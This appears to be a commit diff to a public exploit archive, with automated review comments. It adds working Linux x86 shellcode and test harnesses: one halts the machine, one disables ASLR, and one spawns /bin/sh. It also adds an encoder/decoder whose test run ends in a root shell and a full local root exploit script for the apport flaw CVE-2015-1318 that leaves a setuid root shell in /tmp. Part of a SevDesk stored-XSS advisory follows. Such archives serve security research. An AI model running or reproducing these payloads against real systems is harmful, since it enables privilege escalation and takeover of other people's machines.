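+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
+Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
+Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
+Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
+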
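Review bot: "Arbitrary code execution" overstates what the evidence shows: the PoC body `folderName[*/-CODE EXECUTION VULNERABILITY!;]` is stored and then rendered verbatim into the folder list (`...folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe>...`) and into the breadcrumb of `browse_folder.html`, i.e. persistent HTML/script injection in the wifi web UI, and the impact the Technical Details themselves list (`session hijacking, persistent phishing, persistent external redirects`) is the impact of a stored cross-site scripting issue, not of code running on the device. I would retitle to `Photo Manager Pro 4.4.0 iOS - Persistent Script Injection (folderName)` and qualify the abstract accordingly, and reconcile `Severity Level: Critical` with the `estimated as high` wording that appears twice further down. The `PoC: Vulnerable Source` excerpt is the client-side `createFolder()` that merely submits the request; the missing control is on the server where `folderName` is written into index.html and the breadcrumb, so the fix paragraph should name that point explicitly: `Encode the stored folderName for the HTML text and attribute contexts where the folder list and breadcrumb are generated, in addition to restricting the accepted characters on input.`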
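--- a/platforms/lin_x86-64/shellcode/36750.c
+++ b/platforms/lin_x86-64/shellcode/36750.c
@@ -0,0 +1,27 @@
+/*
+
++========================================================================================
+| # Exploit Title : linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes
+| # Exploit Author : Febriyanto Nugroho
+| # Tested on : Linux Debian 5.0.5
++========================================================================================
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+char s[] = "\x31\xc0\x31\xdb\x50\x53\x89\xe1"
+"\xb0\x46\xcd\x80\x31\xc0\x50\x68"
+"\x68\x61\x6c\x74\x68\x6e\x2f\x2f"
+"\x2f\x68\x2f\x73\x62\x69\x89\xe3"
+"\x50\x53\xb0\x0b\x89\xe1\xcd\x80"
+"\x31\xc0\x50\x89\xe3\xb0\x01\xcd"
+"\x80";
+
+int main(int argc, char *argv[]) {
+printf("shellcode length -> %d bytes\n", strlen(s));
+int(*fuck)() = (int(*)())s;
+fuck();
+return 0;
+}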
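Review bot: `printf("shellcode length -> %d bytes\n", strlen(s));` passes a `size_t` to `%d`; use `%zu`, or cast to `int` as other harnesses in this commit do. The file is catalogued under `platforms/lin_x86-64/` although the title says linux/x86 and the stub uses the 32-bit `int 0x80` convention (`\xcd\x80`), so either the platform in files.csv or the title is wrong. `int(*fuck)() = (int(*)())s;` executes a writable data array, which only succeeds when the data segment is executable — a one-line comment stating that dependency would spare readers a puzzling segfault on a hardened toolchain.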
64
platforms/lin_x86/shellcode/36637.c
@ -0,0 +1,64 @@
/*
|
||||
#Title: Disable ASLR in Linux (less byte and more compact)
|
||||
#Length: 84 bytes
|
||||
#Date: 3 April 2015
|
||||
#Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+)
|
||||
#Tested On: kali-linux-1.0.6-i386
|
||||
|
||||
Thanks to stackoverflow
|
||||
|
||||
|
||||
|
||||
section .text
|
||||
global _start
|
||||
|
||||
_start:
|
||||
|
||||
jmp short fileaddress
|
||||
shellcode:
|
||||
pop ebx
|
||||
xor eax,eax
|
||||
mov byte [ebx + 35],al
|
||||
push byte 5
|
||||
pop eax
|
||||
push byte 2
|
||||
pop ecx
|
||||
int 80h
|
||||
|
||||
mov ebx, eax
|
||||
push byte 4
|
||||
pop eax
|
||||
jmp short output
|
||||
cont:
|
||||
pop ecx
|
||||
push byte 2
|
||||
pop edx
|
||||
int 80h
|
||||
|
||||
push byte 1
|
||||
pop eax
|
||||
xor ebx, ebx
|
||||
int 80h
|
||||
|
||||
fileaddress:
|
||||
call shellcode
|
||||
db '/proc/sys/kernel/randomize_va_spaceX'
|
||||
|
||||
output:
|
||||
call cont
|
||||
db '0',10
|
||||
*/
|
||||
|
||||
char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58"
|
||||
"\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a
|
||||
\xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70
|
||||
\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72
|
||||
\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63
|
||||
\x65\x58\xe8\xc5\xff\xff\xff\x30\x0a";
|
||||
|
||||
int main()
|
||||
{
|
||||
int *ret;
|
||||
ret = (int *)&ret + 2;
|
||||
(*ret) = (int)shellcode;
|
||||
}
|
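Review bot: The `char shellcode[]` literal from `"\x6a\x02\x59...` onward runs across line breaks with no closing quote and no backslash continuation, so as stored the file does not compile (missing terminating `"`); if this is only a rendering artifact of the commit page, verify the source file, otherwise each line needs its own quoted segment. `ret = (int *)&ret + 2; (*ret) = (int)shellcode;` depends on one particular stack-frame layout and is undefined behavior, so the harness may silently do nothing under a different compiler or optimization level — document that assumption next to the assignment. From a hardening viewpoint the payload writes `0` to `/proc/sys/kernel/randomize_va_space`, which needs root, and a write to that path is a good audit event (an auditd watch on the file) for detecting post-exploitation ASLR tampering.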
58
platforms/lin_x86/shellcode/36778.c
@ -0,0 +1,58 @@
/*
|
||||
; Title: Linux/x86 execve "/bin/sh" - shellcode 35 bytes
|
||||
; Platform: linux/x86_64
|
||||
; Date: 2014-06-26
|
||||
; Author: Mohammad Reza Espargham
|
||||
; Simple ShellCode
|
||||
|
||||
section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: eb 17 jmp 8048079
|
||||
|
||||
08048062 :
|
||||
8048062: 5e pop %esi
|
||||
8048063: 31 d2 xor %edx,%edx
|
||||
8048065: 52 push %edx
|
||||
8048066: 56 push %esi
|
||||
8048067: 89 e1 mov %esp,%ecx
|
||||
8048069: 89 f3 mov %esi,%ebx
|
||||
804806b: 31 c0 xor %eax,%eax
|
||||
804806d: b0 0b mov $0xb,%al
|
||||
804806f: cd 80 int $0x80
|
||||
8048071: 31 db xor %ebx,%ebx
|
||||
8048073: 31 c0 xor %eax,%eax
|
||||
8048075: 40 inc %eax
|
||||
8048076: cd 80 int $0x80
|
||||
|
||||
08048078 :
|
||||
8048078: e8 e5 ff ff ff call 8048062
|
||||
804807d: 2f das
|
||||
804807e: 62 69 6e bound %ebp,0x6e(%ecx)
|
||||
8048081: 2f das
|
||||
8048082: 73 68 jae 80480ec
|
||||
*/
|
||||
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
#define PAGE_SIZE 4096U
|
||||
|
||||
|
||||
char code[] = {
|
||||
"\xeb\x16\x5e\x31\xd2\x52\x56\x89\xe1\x89\xf3\x31\xc0\xb0\x0b\xcd"
|
||||
"\x80\x31\xdb\x31\xc0\x40\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69"
|
||||
"\x6e\x2f\x73\x68"
|
||||
};
|
||||
|
||||
int
|
||||
main() {
|
||||
|
||||
printf("Shellcode Length: %d\n", (int)strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
|
||||
return 0;
|
||||
}
|
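Review bot: `#include <sys/mman.h>` and `#define PAGE_SIZE 4096U` are unused in this file — drop them, or finish the mprotect-based harness they were evidently meant for. The header comment says `; Platform: linux/x86_64` and `shellcode 35 bytes`, but the code uses 32-bit registers with `int $0x80` (matching the `lin_x86` path) and `code[]` holds 36 bytes; the listing also shows `eb 17 jmp 8048079` while the array starts `\xeb\x16`, so the header and disassembly should be regenerated from the bytes actually shipped. `main()` continues outside nothing here, but `(int)strlen(code)` with `%d` is correct and could be copied into the sibling 36750.c entry.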
268
platforms/lin_x86/shellcode/36781.py
@ -0,0 +1,268 @@
/*
|
||||
Followtheleader custom execve-shellcode Encoder/Decoder - Linux Intel/x86
|
||||
Author: Konstantinos Alexiou
|
||||
*/
|
||||
------------------------------------------------------------------------------------------------------------------
|
||||
a)Python script. Encoder for shellcode (execve)
|
||||
------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
#!/usr/bin/python
|
||||
# Author:Konstantinos Alexiou
|
||||
# Encoding name: Followtheleader-encoder
|
||||
# Description: Custom execve-shellcode encoder based on a given byte which is used to encode the execve shellcode
|
||||
import random
|
||||
import sys
|
||||
shellcode =('\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80')
|
||||
|
||||
total = len(sys.argv)
|
||||
if total != 2:
|
||||
print '!!Give the LEADER byte'
|
||||
print 'Script must run as: python xxx.py LEADER'
|
||||
print 'LEADER is any integer between 17-255'
|
||||
print 'e.g python Followtheleader.py 32'
|
||||
else:
|
||||
try:
|
||||
leader = int(sys.argv[1])
|
||||
fb = int(hex(leader)[2:3],16) # Split the LEADER. If leader = AF -->fb=A
|
||||
sb = int(hex(leader)[3:],16) # Split the LEADER. If LEADER = AF -->sb=F
|
||||
encoded = ' '
|
||||
encoded2 = ' '
|
||||
encoded = '\\x'
|
||||
encoded += hex(leader)[2:] # FIRST byte the LEADER
|
||||
encoded2 = '0x'
|
||||
encoded2 += hex(leader)[2:]
|
||||
i=0
|
||||
for x in bytearray(shellcode): # READ every Instruction as BYTE
|
||||
i +=1
|
||||
hopcode = '%02x' %x # KEEP only the HEX value of opcode
|
||||
Dec_hopcode = int(hopcode, 16) # CALCULATE the DECIMAL value of opcode
|
||||
suplX = 255 - Dec_hopcode # CALCULATE the SUPPLEMENT
|
||||
rev_suplx = hex(suplX)[::-1] # REVERT the bytes of SUPPLEMENT (ae --> ea)
|
||||
subfs = fb-sb
|
||||
#----------------------------The Encoded byte ----------------------------------------------------
|
||||
xxx = hex(int(abs(subfs)) + int(rev_suplx[0:2],16))
|
||||
#-------------------------------------------------------------------------------------------------
|
||||
if len(xxx)>4: # Check if xxx > 0xff
|
||||
print 'Overflow encoding.Try again!!!.'
|
||||
sys.exit()
|
||||
elif xxx == '0x0': # Check if ZERO byte was encoded
|
||||
print 'A byte was Encoded as 0x00 .Try again!!!'
|
||||
sys.exit()
|
||||
encoded += '\\x' # Put \x first
|
||||
encoded += xxx[2:] # Put the xxx afterwards
|
||||
insertByte = hex(random.randint(1,255)) # Put a Random byte
|
||||
encoded += '\\x'
|
||||
encoded += insertByte[2:]
|
||||
i +=1
|
||||
encoded2 += ','
|
||||
encoded2 += xxx
|
||||
encoded2 += ','
|
||||
encoded2 += '0x'
|
||||
encoded2 += insertByte[2:]
|
||||
print ' *************';
|
||||
print ' LEADER BYTE :decimal(%d), HEX(0x%x)' %(int(sys.argv[1]),leader)
|
||||
print ' *************';
|
||||
print 'Len of Shellcode: %02d' % i
|
||||
print '------------------------------------------------------------------------';
|
||||
print ' 1. Style:= %s ' % encoded
|
||||
print '------------------------------------------------------------------------';
|
||||
print ' 2. Style:= %s ' % encoded2
|
||||
print '------------------------------------------------------------------------';
|
||||
except:
|
||||
print "exiting..."
|
||||
---------------------------------------------------------------------------------------
|
||||
|
||||
|
||||
Followtheleader Encoder test run :
|
||||
|
||||
$ python Followtheleader-encoder.py 67
|
||||
*************
|
||||
LEADER BYTE :decimal(67), HEX(0x43)
|
||||
*************
|
||||
Len of Shellcode: 50
|
||||
------------------------------------------------------------------------
|
||||
1. Style:= \x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\xe\xb6\xe\xbc\xc9\xe3\x7a\xaf\x7a\x78
|
||||
\xe\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78
|
||||
\xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe
|
||||
------------------------------------------------------------------------
|
||||
2. Style:= 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,
|
||||
0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,
|
||||
0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe
|
||||
------------------------------------------------------------------------
|
||||
|
||||
|
||||
b) Decoder for the encoded shellcode (execve-stack)
|
||||
---------------------------------------------------------------------------------------
|
||||
$ cat Followtheleader-decoder.nasm
|
||||
; Filename: Followtheleader-decoder.nasm
|
||||
; Author: Konstantinos Alexiou
|
||||
; Description: Followtheleader custom insertion Encoder, Linux Intel/x86
|
||||
|
||||
global _start
|
||||
section .text
|
||||
|
||||
_start:
|
||||
jmp short call_shellcode
|
||||
|
||||
decoder:
|
||||
pop esi ; Address of EncodedShellcode to ESI
|
||||
lea edi, [esi] ; Load effective address of what is contained on EDI
|
||||
xor ecx, ecx ; Zero ECX
|
||||
mul ecx ; This instruction will cause both EAX and EDX to become zero
|
||||
xor ebp, ebp ; Zero the value on EBP
|
||||
mov dl, byte [esi] ; Put the LEADER byte to EDX (DL)
|
||||
|
||||
;(firstb - secondb) CALCULATION
|
||||
mov al, dl ; Copy the LEADER to EAX
|
||||
|
||||
;firstb extraction of LEADER
|
||||
shr dl, 4 ; Keep only the 4 high bits of LEADER to DL (if Leader=ac then DL=a) [firstb]
|
||||
|
||||
;secondb extraction of LEADER
|
||||
shl eax, 28 ; shift left 28 bits of EAX which contains the value of Leader on al
|
||||
shr eax, 28 ; shift right 28 of EAX (if EAX=0xc0000000 now EAX=0x0000000c) [secondb]
|
||||
sub dl, al ; (firstb - secondb) value stored to EDX (DL)
|
||||
jns decode_pr
|
||||
|
||||
negative: ; Calculate the absolute value if negative
|
||||
not dl
|
||||
inc dl
|
||||
|
||||
;decode process
|
||||
decode_pr:
|
||||
|
||||
xor eax, eax
|
||||
xor ebx, ebx
|
||||
xor ecx, ecx
|
||||
|
||||
mov al, byte [esi+1+ebp] ; Put the encoded byte to EAX
|
||||
mov ecx, ebp ; EBP is used as a counter copy the value of EBP to ECX
|
||||
xor cl, 0x32 ; At the end of the shellcode EBP should point 50 in decimal 32 in hex
|
||||
je short EncodedShellcode
|
||||
|
||||
;rev_suplx Calculation
|
||||
mov cl, al ; Put the Encoded byte to EAX (xxx to EAX)
|
||||
sub cl, dl ; rev_suplx= xxx-(firstb - secondb) value stored to CL
|
||||
mov bl, cl ; Keep Backup of rev_suplx to BL
|
||||
mov al, cl ; Second backup of CL
|
||||
|
||||
;Revert the bytes on rev_suplx
|
||||
shr bl, 4 ; shift 4 bits right (if was bl=ec now bl=e)
|
||||
shl eax, 28 ; shift left 28 bits of EAX which contains the value of rev_supl on cl( if EAX was 0xec now EAX=0xc0000000)
|
||||
shr eax, 24 ; shift right 24 of EAX (if EAX=0xc0000000 now EAX=0x000000c0)
|
||||
add eax, ebx ; add the value on EBX to EAX (if EAX=0x000000c0 + BL=0xe, EAX=0x0000000ce)
|
||||
|
||||
;Supplement Calculation
|
||||
mov bl, 0xff ; Value of 0xff to BL
|
||||
sub bl, al ; Calculate the Supplement
|
||||
mov byte [edi], bl ; Put the decoded byte to the position of EDI
|
||||
inc edi ; EDI is a pointer to the position which the decoded bytes will be stored
|
||||
add ebp,0x2 ; The EBP is a counter values will be (2,4,6,..50)
|
||||
|
||||
jmp short decode_pr ; Goto the decode process to decode the next bytes
|
||||
|
||||
call_shellcode:
|
||||
call decoder
|
||||
EncodedShellcode: db 0x43,0xed,0x1d,0xf4,0x40,0xfb,0x6f,0x7a,0xa9,0xe,0xb6,0xe,0xbc,0xc9,0xe3,0x7a,0xaf,0x7a,0x78,0xe,0xc5,0xda,0x76,0x6a,0x17,0x1a,0x4e,0x68,0x38,0xc2,0x99,0xfb,0x35,0x68,0x84,0xd2,0xb3,0xcb,0x7c,0x68,0x78,0xe2,0x9a,0xf5,0xe9,0x50,0xc0,0x24,0x91,0xf8,0xfe
|
||||
|
||||
|
||||
---------------------------------------------------------------------------------------------------------------------------------------
|
||||
$ objdump -d ./Followtheleader-decoder -M intel
|
||||
|
||||
./Followtheleader-decoder: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: eb 4e jmp 80480b0 <call_shellcode>
|
||||
|
||||
08048062 <decoder>:
|
||||
8048062: 5e pop esi
|
||||
8048063: 8d 3e lea edi,[esi]
|
||||
8048065: 31 c9 xor ecx,ecx
|
||||
8048067: f7 e1 mul ecx
|
||||
8048069: 31 ed xor ebp,ebp
|
||||
804806b: 8a 16 mov dl,BYTE PTR [esi]
|
||||
804806d: 88 d0 mov al,dl
|
||||
804806f: c0 ea 04 shr dl,0x4
|
||||
8048072: c1 e0 1c shl eax,0x1c
|
||||
8048075: c1 e8 1c shr eax,0x1c
|
||||
8048078: 28 c2 sub dl,al
|
||||
804807a: 79 04 jns 8048080 <decode_pr>
|
||||
|
||||
0804807c <negative>:
|
||||
804807c: f6 d2 not dl
|
||||
804807e: fe c2 inc dl
|
||||
|
||||
08048080 <decode_pr>:
|
||||
8048080: 31 c0 xor eax,eax
|
||||
8048082: 31 db xor ebx,ebx
|
||||
8048084: 31 c9 xor ecx,ecx
|
||||
8048086: 8a 44 2e 01 mov al,BYTE PTR [esi+ebp*1+0x1]
|
||||
804808a: 89 e9 mov ecx,ebp
|
||||
804808c: 80 f1 32 xor cl,0x32
|
||||
804808f: 74 24 je 80480b5 <EncodedShellcode>
|
||||
8048091: 88 c1 mov cl,al
|
||||
8048093: 28 d1 sub cl,dl
|
||||
8048095: 88 cb mov bl,cl
|
||||
8048097: 88 c8 mov al,cl
|
||||
8048099: c0 eb 04 shr bl,0x4
|
||||
804809c: c1 e0 1c shl eax,0x1c
|
||||
804809f: c1 e8 18 shr eax,0x18
|
||||
80480a2: 01 d8 add eax,ebx
|
||||
80480a4: b3 ff mov bl,0xff
|
||||
80480a6: 28 c3 sub bl,al
|
||||
80480a8: 88 1f mov BYTE PTR [edi],bl
|
||||
80480aa: 47 inc edi
|
||||
80480ab: 83 c5 02 add ebp,0x2
|
||||
80480ae: eb d0 jmp 8048080 <decode_pr>
|
||||
|
||||
080480b0 <call_shellcode>:
|
||||
80480b0: e8 ad ff ff ff call 8048062 <decoder>
|
||||
|
||||
080480b5 <EncodedShellcode>:
|
||||
80480b5: 43 inc ebx
|
||||
80480b6: ed in eax,dx
|
||||
80480b7: 1d f4 40 fb 6f sbb eax,0x6ffb40f4
|
||||
80480bc: 7a a9 jp 8048067 <decoder+0x5>
|
||||
80480be: 0e push cs
|
||||
80480bf: b6 0e mov dh,0xe
|
||||
80480c1: bc c9 e3 7a af mov esp,0xaf7ae3c9
|
||||
80480c6: 7a 78 jp 8048140 <EncodedShellcode+0x8b>
|
||||
80480c8: 0e push cs
|
||||
80480c9: c5 da 76 (bad)
|
||||
80480cc: 6a 17 push 0x17
|
||||
80480ce: 1a 4e 68 sbb cl,BYTE PTR [esi+0x68]
|
||||
80480d1: 38 c2 cmp dl,al
|
||||
80480d3: 99 cdq
|
||||
80480d4: fb sti
|
||||
80480d5: 35 68 84 d2 b3 xor eax,0xb3d28468
|
||||
80480da: cb retf
|
||||
80480db: 7c 68 jl 8048145 <EncodedShellcode+0x90>
|
||||
80480dd: 78 e2 js 80480c1 <EncodedShellcode+0xc>
|
||||
80480df: 9a f5 e9 50 c0 24 91 call 0x9124:0xc050e9f5
|
||||
80480e6: f8 clc
|
||||
80480e7: fe .byte 0xfe
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
$ cat shellcode.c
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
unsigned char code[] =\
|
||||
"\xeb\x4e\x5e\x8d\x3e\x31\xc9\xf7\xe1\x31\xed\x8a\x16\x88\xd0\xc0\xea\x04\xc1\xe0\x1c\xc1\xe8\x1c\x28\xc2\x79\x04\xf6\xd2\xfe\xc2\x31\xc0\x31\xdb\x31\xc9\x8a\x44\x2e\x01\x89\xe9\x80\xf1\x32\x74\x24\x88\xc1\x28\xd1\x88\xcb\x88\xc8\xc0\xeb\x04\xc1\xe0\x1c\xc1\xe8\x18\x01\xd8\xb3\xff\x28\xc3\x88\x1f\x47\x83\xc5\x02\xeb\xd0\xe8\xad\xff\xff\xff\x43\xed\x1d\xf4\x40\xfb\x6f\x7a\xa9\x0e\xb6\x0e\xbc\xc9\xe3\x7a\xaf\x7a\x78\x0e\xc5\xda\x76\x6a\x17\x1a\x4e\x68\x38\xc2\x99\xfb\x35\x68\x84\xd2\xb3\xcb\x7c\x68\x78\xe2\x9a\xf5\xe9\x50\xc0\x24\x91\xf8\xfe";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
int (*ret)() = (int(*)())code;
|
||||
ret();
|
||||
}
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
||||
$ gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
|
||||
$ ./shellcode
|
||||
Shellcode Length: 136
|
||||
$whoami
|
||||
root
|
||||
$
|
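Review bot: The bare `except:` closing the encoder also catches the `SystemExit` raised by the two `sys.exit()` calls and any `ValueError` from `int(sys.argv[1])` or the hex slicing, so every failure prints only `exiting...` and the process still ends with status 0; use `except ValueError as e:` with the message, and let `SystemExit` propagate. `rev_suplx = hex(suplX)[::-1]` reverses the `0x` prefix too, so a supplement below 0x10 (input byte 0xf0 or above) yields a slice like `fx` and `int(rev_suplx[0:2],16)` raises — the documented 17-255 LEADER range does not prevent this because it depends on the shellcode byte, and the bundled payload merely happens to avoid it. The file is stored as `36781.py` but is a mixed document (C-style comment header, nasm source, objdump output, C harness) and is not runnable Python; the catalog entry should point at a `.txt`, or the Python part should be split out.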
69
platforms/linux/local/36782.sh
@ -0,0 +1,69 @@
#!/bin/sh
|
||||
#
|
||||
# CVE-2015-1318
|
||||
#
|
||||
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
|
||||
#
|
||||
# Example:
|
||||
#
|
||||
# % uname -a
|
||||
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
|
||||
#
|
||||
# % lsb_release -a
|
||||
# No LSB modules are available.
|
||||
# Distributor ID: Ubuntu
|
||||
# Description: Ubuntu 14.04.2 LTS
|
||||
# Release: 14.04
|
||||
# Codename: trusty
|
||||
#
|
||||
# % dpkg -l | grep '^ii apport ' | awk -F ' ' '{ print $2 " " $3 }'
|
||||
# apport 2.14.1-0ubuntu3.8
|
||||
#
|
||||
# % id
|
||||
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
|
||||
#
|
||||
# % ./apport.sh
|
||||
# pwned-4.3# id
|
||||
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
|
||||
# pwned-4.3# exit
|
||||
|
||||
TEMPDIR=$(mktemp -d)
|
||||
|
||||
cd ${TEMPDIR}
|
||||
|
||||
cp /bin/busybox .
|
||||
|
||||
mkdir -p dev mnt usr/share/apport
|
||||
|
||||
(
|
||||
cat << EOF
|
||||
#!/busybox sh
|
||||
(
|
||||
cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned
|
||||
chmod 5755 /mnt/1/root/tmp/pwned
|
||||
)
|
||||
EOF
|
||||
|
||||
) > usr/share/apport/apport
|
||||
|
||||
chmod +x usr/share/apport/apport
|
||||
|
||||
(
|
||||
cat << EOF
|
||||
mount -o bind . .
|
||||
cd .
|
||||
mount --rbind /proc mnt
|
||||
touch dev/null
|
||||
pivot_root . .
|
||||
./busybox sleep 500 &
|
||||
SLEEP=\$!
|
||||
./busybox sleep 1
|
||||
./busybox kill -11 \$SLEEP
|
||||
./busybox sleep 5
|
||||
EOF
|
||||
) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \
|
||||
lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null
|
||||
|
||||
/tmp/pwned -p
|
||||
|
||||
rm -Rf ${TEMPDIR}
|
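Review bot: `TEMPDIR=$(mktemp -d)` and `cd ${TEMPDIR}` are unchecked and unquoted, so if `mktemp` fails the script keeps running in the caller's working directory, creates `dev`, `mnt` and `usr/share/apport` there, and finally runs `rm -Rf` with an empty argument; write `cd "${TEMPDIR}" || exit 1` (or start with `set -e`). The redirection `2>&1 >/dev/null` on the `lxc-usernsexec` pipeline sends stderr to the original stdout and only stdout to `/dev/null`; if both streams were meant to be silenced the order must be `>/dev/null 2>&1`. The cleanup at the end removes only `${TEMPDIR}`, while the mode-5755 root-owned copy created as `/mnt/1/root/tmp/pwned` (i.e. `/tmp/pwned`) stays on disk — for anyone assessing a host after this PoC has been run, that file is the artifact to look for.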
264
platforms/multiple/webapps/36794.txt
@ -0,0 +1,264 @@
Document Title:
|
||||
===============
|
||||
SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1314
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-03-23
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1314
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.9
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The integrated customer management, digital customer file is the central record for a single customer. invoices, facilities and operations
|
||||
to a customer are stored centrally automated in one place. So the customer file is always up to date. For faster retrieval or reporting
|
||||
contacts can be tagged. In addition, with powerful. Search options you have as the entire customer base better than ever in view.
|
||||
|
||||
Daily backup
|
||||
256bit SSL encryption
|
||||
TÜV certified datacenter
|
||||
|
||||
Free version
|
||||
No hidden costs
|
||||
No minimum contract term
|
||||
|
||||
iPhone App
|
||||
Runs in any browser
|
||||
No installation required on the PC
|
||||
|
||||
Easy to use
|
||||
Reduced to the essentials
|
||||
Automated, where it is only Possible
|
||||
|
||||
(Copy of the Vendor Homepage: https://sevdesk.de/)
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official SEVENIT GmbH SevDesk v3.10 web-application & cloud online-service.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2014-09-01: Researcher Notification & Coordination (Benjamin Kunz Mejri)
|
||||
2014-09-02: Vendor Notification (SevDesk Developer Team)
|
||||
2014-09-07: Vendor Response/Feedback (SevDesk Developer Team)
|
||||
2015-02-01: Vendor Fix/Patch Notification (SevDesk Developer Team)
|
||||
2015-03-23: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
SevenIT
|
||||
Product: SevDesk - Web Application 3.1.0
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
Multiple persistent input validation web vulnerabilities are detected in the official SEVENIT Software GmbH - sevDesk v3.10 web-application.
|
||||
The vulnerability allows remote attackers or low privileged user account to inject own malicious script codes to the application-side of the
|
||||
vulnerable web-application module or service.
|
||||
|
||||
The security vulnerability is located in the `firstname`, `surname` & `family` name values of the main sevDesk `Dasboard` application module.
|
||||
Remote attackers are able to inject own codes to the main dashboard service by manipulation of the registration username. The execution of
|
||||
the injected script code occurs on the application-side in the main dasboard module through the rightHead and feedcontent class. The attack
|
||||
vector is persistent and the request method to inject the code is POST. The victim user can also change the name by usage of the application
|
||||
which does not require an admins interaction on successful exploitation.
|
||||
|
||||
The security risk of the persistent script code inject web vulnerabilities is estimated as medium with a cvss (common vulnerability scoring system)
|
||||
count of 5.9. Exploitation of the persistent vulnerability requires a low privileged sevdesk user account with restricted access and no direct
|
||||
